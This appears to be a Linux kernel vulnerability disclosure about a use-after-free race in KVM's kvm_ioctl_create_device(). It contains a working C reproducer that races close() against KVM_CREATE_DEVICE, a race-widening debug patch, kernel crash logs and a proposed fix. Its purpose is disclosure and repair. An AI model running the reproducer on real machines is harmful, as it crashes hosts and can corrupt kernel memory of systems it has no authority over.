kvm_ioctl_create_device() contains the following code:

	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
	if (!dev)
		return -ENOMEM;

	dev->ops = ops;
	dev->kvm = kvm;

	mutex_lock(&kvm->lock);
	ret = ops->create(dev, cd->type);
	if (ret < 0) {
		mutex_unlock(&kvm->lock);
		kfree(dev);
		return ret;
	}
	list_add(&dev->vm_node, &kvm->devices);
	mutex_unlock(&kvm->lock);

	if (ops->init)
		ops->init(dev);

	ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
	if (ret < 0) {
		mutex_lock(&kvm->lock);
		list_del(&dev->vm_node);
		mutex_unlock(&kvm->lock);
		ops->destroy(dev);
		return ret;
	}

	kvm_get_kvm(kvm);
	cd->fd = ret;

This code:

1. creates a device that holds a reference to the VM object (a borrowed reference: the VM's refcount has not been bumped yet)
2. initializes the device
3. transfers the reference to the device to the caller's file descriptor table
4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real reference

The ownership transfer in step 3 must not happen before the reference to the VM becomes a proper, non-borrowed reference, which only happens in step 4. After step 3, an attacker can close the file descriptor and thereby drop the borrowed reference, which can cause the refcount of the kvm object to drop to zero, freeing the VM while kvm_ioctl_create_device() is still using it.
Reproducer code:
=================================
// run as `gcc -o kvm_fd_install kvm_fd_install.c -Wall -pthread && ./kvm_fd_install`
#include <linux/kvm.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>

static int predicted_fd = -1;
static volatile int ready = 0;

static void *do_close_predicted_fd(void *dummy) {
  ready = 1;
  while (1) close(predicted_fd);
  return NULL; /*unreachable*/
}

int main(void) {
  int kvm = open("/dev/kvm", O_RDWR);
  if (kvm == -1) err(1, "open kvm");
  int vm = ioctl(kvm, KVM_CREATE_VM, 0);
  if (vm < 0) err(1, "KVM_CREATE_VM");

  predicted_fd = dup(0);
  if (predicted_fd == -1) err(1, "dup");
  close(predicted_fd);

  pthread_t thread;
  if (pthread_create(&thread, NULL, do_close_predicted_fd, NULL))
    errx(1, "pthread_create");
  while (ready == 0) /*spin*/;

  struct kvm_create_device cd = {
    .type = KVM_DEV_TYPE_VFIO,
    .fd = -1, //outparm
    .flags = 0
  };
  if (ioctl(vm, KVM_CREATE_DEVICE, &cd)) err(1, "KVM_CREATE_DEVICE");
  printf("created device: %d\n", cd.fd);
}
=================================

To reliably reproduce the issue, patch the kernel as follows to widen the race:
=================================
diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 5ecea812cb6a..d43677044ec0 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -51,6 +51,7 @@
 #include <linux/slab.h>
 #include <linux/sort.h>
 #include <linux/bsearch.h>
+#include <linux/delay.h>

 #include <asm/processor.h>
 #include <asm/io.h>
@@ -2970,6 +2971,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
 	bool test = cd->flags & KVM_CREATE_DEVICE_TEST;
 	int ret;

+	pr_warn("kvm_ioctl_create_device: entry: refcount=%u\n", refcount_read(&kvm->users_count));
+
 	if (cd->type >= ARRAY_SIZE(kvm_device_ops_table))
 		return -ENODEV;

@@ -3000,6 +3003,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
 	if (ops->init)
 		ops->init(dev);

+	pr_warn("kvm_ioctl_create_device: before anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count));
+
 	ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
 	if (ret < 0) {
 		mutex_lock(&kvm->lock);
@@ -3009,8 +3014,13 @@ static 
int kvm_ioctl_create_device(struct kvm *kvm, return ret; } + pr_warn("kvm_ioctl_create_device: after anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count)); + msleep(100); + pr_warn("kvm_ioctl_create_device: after sleeping: refcount=%u\n", refcount_read(&kvm->users_count)); + kvm_get_kvm(kvm); cd->fd = ret; + pr_warn("kvm_ioctl_create_device: exiting: refcount=%u\n", refcount_read(&kvm->users_count)); return 0; } ================================= splat in a patched kernel: ================================= [ 224.536858] kvm_ioctl_create_device: entry: refcount=1 [ 224.539410] kvm_ioctl_create_device: before anon_inode_getfd: refcount=1 [ 224.541542] kvm_ioctl_create_device: after anon_inode_getfd: refcount=1 [ 224.651860] BUG: unable to handle kernel paging request at ffffc900015deb08 [ 224.653744] #PF error: [normal kernel read fault] [ 224.655032] PGD 1ead35067 P4D 1ead35067 PUD 1eaeb6067 PMD 1e2c46067 PTE 0 [ 224.656834] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN [ 224.658364] CPU: 0 PID: 1155 Comm: kvm_fd_install Not tainted 5.0.0-rc3+ #251 [ 224.660252] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 224.662551] RIP: 0010:kvm_vm_ioctl+0xd75/0xdd0 [ 224.663746] Code: c7 c7 a0 f3 a0 a8 e8 53 fa 21 00 bf 64 00 00 00 e8 a0 e5 24 00 be 04 00 00 00 4c 89 ef e8 03 ba 42 00 4c 89 ef e8 cb d8 42 00 <8b> b5 08 9b 00 00 48 c7 c7 00 f4 a0 a8 e8 22 fa 21 00 48 89 ef e8 [ 224.668662] RSP: 0018:ffff8881e3c3f988 EFLAGS: 00010246 [ 224.670057] RAX: 0000000000000000 RBX: 1ffff1103c787f36 RCX: ffffffffa6a2c325 [ 224.671950] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffffc900015deb08 [ 224.673835] RBP: ffffc900015d5000 R08: fffff520002bbd62 R09: fffff520002bbd62 [ 224.675731] R10: 0000000000000001 R11: fffff520002bbd61 R12: ffff8881d65863e0 [ 224.677615] R13: ffffc900015deb08 R14: ffff8881d65863c8 R15: ffffffffa9653bc0 [ 224.679506] FS: 00007f11f9500700(0000) GS:ffff8881eb000000(0000) knlGS:0000000000000000 [ 224.681643] 
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 224.684886] CR2: ffffc900015deb08 CR3: 00000001dfc20003 CR4: 00000000003606f0 [ 224.686788] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 224.688674] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 224.690565] Call Trace: [...] [ 224.721351] do_vfs_ioctl+0x134/0x8f0 [...] [ 224.732860] ksys_ioctl+0x70/0x80 [ 224.733749] __x64_sys_ioctl+0x3d/0x50 [ 224.734764] do_syscall_64+0x73/0x160 [ 224.735743] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 224.737092] RIP: 0033:0x7f11f8e21dd7 [ 224.738048] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48 [ 224.742945] RSP: 002b:00007ffeb6611e58 EFLAGS: 00000202 ORIG_RAX: 0000000000000010 [ 224.744932] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f11f8e21dd7 [ 224.746810] RDX: 00007ffeb6611e64 RSI: 00000000c00caee0 RDI: 0000000000000004 [ 224.748681] RBP: 00007ffeb6611e80 R08: 00007f11f8d40700 R09: 00007f11f8d40700 [ 224.750556] R10: 00007f11f8d409d0 R11: 0000000000000202 R12: 0000564cddd8a7b0 [ 224.752433] R13: 00007ffeb6611f60 R14: 0000000000000000 R15: 0000000000000000 [ 224.754311] Modules linked in: btrfs xor zstd_compress raid6_pq [ 224.755904] CR2: ffffc900015deb08 [ 224.756792] ---[ end trace 670d8a6b1c3ab210 ]--- ================================= Without the patch, I can still crash a Debian stable distro kernel by running the reproducer in a loop (`while true; do ./kvm_fd_install; done`), but it takes a while to trigger: ================================= [ 251.054762] BUG: unable to handle kernel NULL pointer dereference at 00000000000000a8 [ 251.057734] IP: [] down_write+0x1b/0x40 [ 251.059903] PGD 0 [ 251.061455] Oops: 0002 [#1] SMP [ 251.062661] Modules linked in: ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat 
nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack br_netfilter bridge stp llc aufs(O) overlay snd_hda_codec_generic kvm_intel snd_hda_intel qxl kvm ttm irqbypass crct10dif_pclmul crc32_pclmul ghash_clmulni_intel drm_kms_helper snd_hda_codec snd_hda_core joydev virtio_balloon snd_hwdep evdev sg snd_pcm 9pnet_virtio serio_raw snd_timer snd button virtio_console binfmt_misc soundcore pcspkr drm 9p 9pnet fscache ip_tables x_tables autofs4 ext4 crc16 jbd2 fscrypto ecb mbcache btrfs crc32c_generic xor hid_generic usbhid hid raid6_pq sr_mod cdrom ata_generic virtio_blk virtio_net crc32c_intel ata_piix aesni_intel uhci_hcd [ 251.085764] ehci_pci aes_x86_64 ehci_hcd glue_helper libata lrw gf128mul ablk_helper psmouse i2c_piix4 cryptd virtio_pci usbcore virtio_ring usb_common scsi_mod virtio floppy [ 251.090094] CPU: 4 PID: 6392 Comm: kvm_fd_install Tainted: G O 4.9.0-8-amd64 #1 Debian 4.9.130-2 [ 251.092751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 251.094947] task: ffff949b676f10c0 task.stack: ffffb79691840000 [ 251.096524] RIP: 0010:[] [] down_write+0x1b/0x40 [ 251.098605] RSP: 0018:ffffb79691843bf0 EFLAGS: 00010246 [ 251.100029] RAX: 00000000000000a8 RBX: 00000000000000a8 RCX: ffffb79691843c28 [ 251.101904] RDX: ffffffff00000001 RSI: 0000000000000286 RDI: 00000000000000a8 [ 251.103786] RBP: ffff949b4650b1d8 R08: 0000000000000000 R09: 0000000000000000 [ 251.105659] R10: ffff949b66a84510 R11: ffffdb9787f9bf80 R12: ffff949b4650b220 [ 251.107556] R13: ffff949b4650b180 R14: ffffffff96310034 R15: ffff949b4650b180 [ 251.109423] FS: 0000000000000000(0000) GS:ffff949b73d00000(0000) knlGS:0000000000000000 [ 251.111560] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 251.113081] CR2: 00000000000000a8 CR3: 00000001cf808000 CR4: 0000000000360670 [ 251.114956] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 251.116847] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 
0000000000000400 [ 251.118718] Stack: [ 251.119277] ffff949b67cc0000 ffffffff956933f1 ffffb79691843c00 ffff949b67cc0000 [ 251.122232] ffff949b67cc0000 ffff949b69ce4b68 ffff949b6a624060 ffff949b693cd740 [ 251.124294] ffff949b69ce4b68 ffffffffc07410b2 ffff949b67cc0000 0000000000000008 [ 251.126345] Call Trace: [ 251.127015] [] ? debugfs_remove_recursive+0x51/0x1c0 [ 251.128780] [] ? kvm_put_kvm+0x32/0x1d0 [kvm] [ 251.130366] [] ? kvm_vm_release+0x1d/0x30 [kvm] [ 251.132000] [] ? __fput+0xd8/0x220 [ 251.133327] [] ? task_work_run+0x7f/0xa0 [ 251.134790] [] ? do_exit+0x2d5/0xaf0 [ 251.136163] [] ? do_group_exit+0x3a/0xa0 [ 251.137618] [] ? get_signal+0x299/0x640 [ 251.139056] [] ? do_signal+0x36/0x6a0 [ 251.140458] [] ? kvm_arch_hardware_disable+0x15/0x40 [kvm] [ 251.142324] [] ? __fput+0x17d/0x220 [ 251.143687] [] ? task_work_run+0x84/0xa0 [ 251.145156] [] ? exit_to_usermode_loop+0x71/0xb0 [ 251.146794] [] ? do_syscall_64+0xdd/0xf0 [ 251.148261] [] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6 [ 251.150074] Code: 01 74 08 48 c7 43 20 01 00 00 00 5b c3 0f 1f 00 0f 1f 44 00 00 53 48 89 fb e8 b2 df ff ff 48 ba 01 00 00 00 ff ff ff ff 48 89 d8 48 0f c1 10 85 d2 74 05 e8 17 be d2 ff 65 48 8b 04 25 c0 fb [ 251.157011] RIP [] down_write+0x1b/0x40 [ 251.158480] RSP [ 251.159418] CR2: 00000000000000a8 [ 251.160300] ---[ end trace b3803036d037ea83 ]--- [ 251.161513] Fixing recursive fault but reboot is needed! ================================= I have requested a CVE identifier from MITRE, but haven't heard back yet. I am attaching a suggested patch; here's an inline copy for review (with clobbered whitespace): =========================================== From 7396c501baf3f066c05a74c790775c2c686be8a7 Mon Sep 17 00:00:00 2001 From: Jann Horn Date: Sat, 26 Jan 2019 01:19:40 +0100 Subject: [PATCH] kvm: fix temporary refcount drop in kvm_ioctl_create_device() As soon as we call anon_inode_getfd(), userspace can close the device, causing a kvm_put_kvm() call that drops a reference. 
This means that we need to grab a reference for the device before anon_inode_getfd(), otherwise the VM can disappear from under us.

Fixes: 852b6d57dc7f ("kvm: add device control API")
Cc: stable@kernel.org
Signed-off-by: Jann Horn
---
 virt/kvm/kvm_main.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 5ecea812cb6a..585845203db8 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -3000,8 +3000,10 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
 	if (ops->init)
 		ops->init(dev);

+	kvm_get_kvm(kvm);
 	ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC);
 	if (ret < 0) {
+		kvm_put_kvm(kvm);
 		mutex_lock(&kvm->lock);
 		list_del(&dev->vm_node);
 		mutex_unlock(&kvm->lock);
@@ -3009,7 +3011,6 @@ static int kvm_ioctl_create_device(struct kvm *kvm,
 		return ret;
 	}

-	kvm_get_kvm(kvm);
 	cd->fd = ret;
 	return 0;
 }
-- 
2.20.1.495.gaa96b0ce6b-goog
===========================================